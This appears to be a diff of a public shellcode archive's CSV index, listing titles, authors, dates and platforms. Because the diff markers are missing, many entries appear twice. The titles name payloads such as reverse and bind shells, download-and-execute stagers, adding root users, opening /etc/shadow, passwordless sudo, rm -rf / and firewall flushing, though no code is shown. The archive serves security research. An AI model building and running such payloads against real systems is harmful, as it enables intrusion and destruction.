13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator + Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
@ -82,17 +82,17 @@ id,file,description,date,author,type,platform
13324,shellcodes/linux_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,shellcode,linux_x86
13325,shellcodes/linux_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",shellcode,linux_x86
13326,shellcodes/linux_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,linux_x86
13327,shellcodes/linux_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86
13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86
13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
@ -101,7 +101,7 @@ id,file,description,date,author,type,platform
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() + Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
@ -110,14 +110,14 @@ id,file,description,date,author,type,platform
13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) + Re-Use Of Strings In .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
@ -136,22 +136,22 @@ id,file,description,date,author,type,platform
13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86
13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86
13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -163,24 +163,24 @@ id,file,description,date,author,type,platform
13405,shellcodes/linux_x86/13405.c,"Linux/x86 - _exit(1) Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86
13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,linux_x86
13414,shellcodes/linux_x86/13414.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,linux_x86
13415,shellcodes/linux_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)",2005-07-11,Okti,shellcode,linux_x86
13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86
13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86
13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86
13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
@ -190,7 +190,7 @@ id,file,description,date,author,type,platform
13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86
13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86
13434,shellcodes/linux_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13435,shellcodes/linux_x86/13435.c,"Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)",2004-09-26,hts,shellcode,linux_x86
13436,shellcodes/linux_x86/13436.c,"Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,linux_x86
13437,shellcodes/linux_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
13438,shellcodes/linux_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
@ -212,10 +212,10 @@ id,file,description,date,author,type,platform
13453,shellcodes/bsd_x86/13453.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,bsd_x86
13454,shellcodes/linux_x86/13454.c,"Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,preedator,shellcode,linux_x86
13455,shellcodes/linux_x86/13455.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13456,shellcodes/linux_x86/13456.c,"Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
@ -238,118 +238,118 @@ id,file,description,date,author,type,platform
13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot() Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
